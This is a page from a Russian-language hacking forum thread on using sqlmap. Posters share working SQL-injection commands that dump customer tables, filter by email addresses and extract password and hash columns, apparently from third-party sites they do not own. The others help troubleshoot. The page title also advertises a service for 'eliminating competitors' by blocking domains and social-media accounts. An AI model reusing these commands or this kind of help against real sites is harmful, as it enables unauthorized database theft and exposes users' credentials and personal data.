УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 96 из 115

Опции темы

Поиск в этой теме

Опции просмотра

#951

04.11.2019, 18:31

brown

Участник форума

Регистрация: 16.10.2016

Сообщений: 189

Провел на форуме:
43449

Репутация: 1

Oops - It seems the page you are looking for is not here

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''DLAj29'' order by t.id desc limit 9' at line 4

не крутится( какой темпер можно заюзать?

Yii Framework/PDO

#952

05.11.2019, 15:22

Estet

Познающий

Регистрация: 30.08.2016

Сообщений: 34

Провел на форуме:
12641

Репутация: 0

Цитата:

Сообщение от Baskin-Robbins

↑
--where=email LIKE '%@site.com'
но не уверен, сейчас проверил на sqlmap - не хочет работать, хотя вручную все работает

вдруг кому будет полезно.

тут DBMS is Microsoft SQL Server это сработало.

#953

05.11.2019, 16:09

karkajoi

Постоянный

Регистрация: 26.10.2016

Сообщений: 438

Провел на форуме:
96779

Репутация: 5

Цитата:

Сообщение от fandor9

↑
А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки:

Код:

./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3

Попадались мне тоже пробелы в MSSQL( Правда было в имени БД) помогло добавление вместо пробела %20, и мапа начала крутить без проблем. По идее должно для всего работать.

Код:

./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C Customer%20Group --where="'Customer%20Group' IS NOT NULL" --dump --threads=10 -v 3

так по пробуй.

#954

05.11.2019, 18:41

Estet

Познающий

Регистрация: 30.08.2016

Сообщений: 34

Провел на форуме:
12641

Репутация: 0

Цитата:

Сообщение от karkajoi

↑
Попадались мне тоже пробелы в MSSQL( Правда было в имени БД) помогло добавление вместо пробела %20, и мапа начала крутить без проблем. По идее должно для всего работать.

Код:

./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C Customer%20Group --where="'Customer%20Group' IS NOT NULL" --dump --threads=10 -v 3

так по пробуй.

уж не знаю, в чем там дело.

--where="Customer%20Group=General" - не работает (в любых комбинациях, и да General значения там есть)

--where="Email LIKE '%@site.com'" - прекрасно работает

#955

06.11.2019, 17:26

xCharley88x

Новичок

Регистрация: 06.11.2019

Сообщений: 1

Провел на форуме:
334

Репутация: 0

Доброго времени суток

есть проблемма с выводом из базы

+-------------------+-------------+

| Column | Type |

+-------------------+-------------+

| aPass | blob |

--hex и --no-cast не подходят,меняется вывод но проблемма не решается

--binary-fields тоже

пассы судя по всему в открытом виде не хэш

есть тут кто может помочь?

за помощ отблагодарю!

#956

06.11.2019, 20:32

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

пробуйте с начало руками, смотрите в чем проблема, может своими запросами получится через --sql-shell, думаю что какой-то косяк с кодировкой что бьет вывод

#957

07.11.2019, 00:11

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

blob выводится через --hex так в чем проблема то?

Цитата:

Сообщение от xCharley88x

↑
меняется вывод но проблемма не решается

#958

07.11.2019, 03:07

Estet

Познающий

Регистрация: 30.08.2016

Сообщений: 34

Провел на форуме:
12641

Репутация: 0

Народ, кто встречал такое:

Извлекаю уже на третьем сайте, подобную хрень:

?t?1f?????F/???|????6(?\\R?jGa??,b?`???????

Соль такого формата

-121880803

либо положительное значение.

Пробовал закинуть свой пас и извлечь хэш, получил тоже самое.

закинул в базу пароль: 123qwe

получил его хэш: ?;\n?p????x=A?F??)9???hR??Pr????q??

Кто встречал подобное? Грешил на язык, но вроде и сайты англоязычные и это же хэш) они бывают на других языках? ) Сори не так давно работаю с хэш функциями, не во всем разб

#959

09.11.2019, 09:28

vladF

Новичок

Регистрация: 05.12.2018

Сообщений: 16

Провел на форуме:
6200

Репутация: 0

Сканер нашел уязвимость,но я с таким столкнулся впервые

Код:

-u "https://site.com/user_save.php" -p "county_id" --risk="3" --method="POST" --data="--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22forename%22

Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22surname%22

Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22email%22

netsparker@example.com
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22new_pass%22

N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22retype_pass%22

N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22county_id%22

test
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22town_id%22

893
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22phone%22

3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22mobile%22

3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22terms_conditions%22

on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22subscribe_emails%22

on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22g-recaptcha-response%22

10000000146
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22submit%22

Create Account
--31ed9d031d5848e3a524ba24f417a44b--
" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" --cookie="PHPSESSID=vorccgbo8prl78srfaqavg0map" --headers="Host:www.site.com\nCache-Control:no-cache\nReferer:https://site.com/user_save.php\nAccept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Language:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-Type:multipart/form-data; boundary=31ed9d031d5848e3a524ba24f417a44b" --dbms="MySQL"

Пробую через sqlmap - получаю такую ошибку:

[CRITICAL] all testable parameters you provided are not present within the given request data

Как правильно скормить в sqlmap?

#960

09.11.2019, 10:58

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от vladF

↑
Сканер нашел уязвимость,но я с таким столкнулся впервые

Код:

-u "https://site.com/user_save.php" -p "county_id" --risk="3" --method="POST" --data="--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22forename%22

Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22surname%22

Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22email%22

netsparker@example.com
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22new_pass%22

N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22retype_pass%22

N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22county_id%22

test
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22town_id%22

893
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22phone%22

3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22mobile%22

3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22terms_conditions%22

on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22subscribe_emails%22

on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22g-recaptcha-response%22

10000000146
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22submit%22

Create Account
--31ed9d031d5848e3a524ba24f417a44b--
" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" --cookie="PHPSESSID=vorccgbo8prl78srfaqavg0map" --headers="Host:www.site.com\nCache-Control:no-cache\nReferer:https://site.com/user_save.php\nAccept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Language:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-Type:multipart/form-data; boundary=31ed9d031d5848e3a524ba24f417a44b" --dbms="MySQL"

Пробую через sqlmap - получаю такую ошибку:
[CRITICAL] all testable parameters you provided are not present within the given request data
Как правильно скормить в sqlmap?

Правильно сложите весь пакет запроса в файл и подключите его через параметр: sqlmap.py -r file.txt

Страница 96 из 115

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход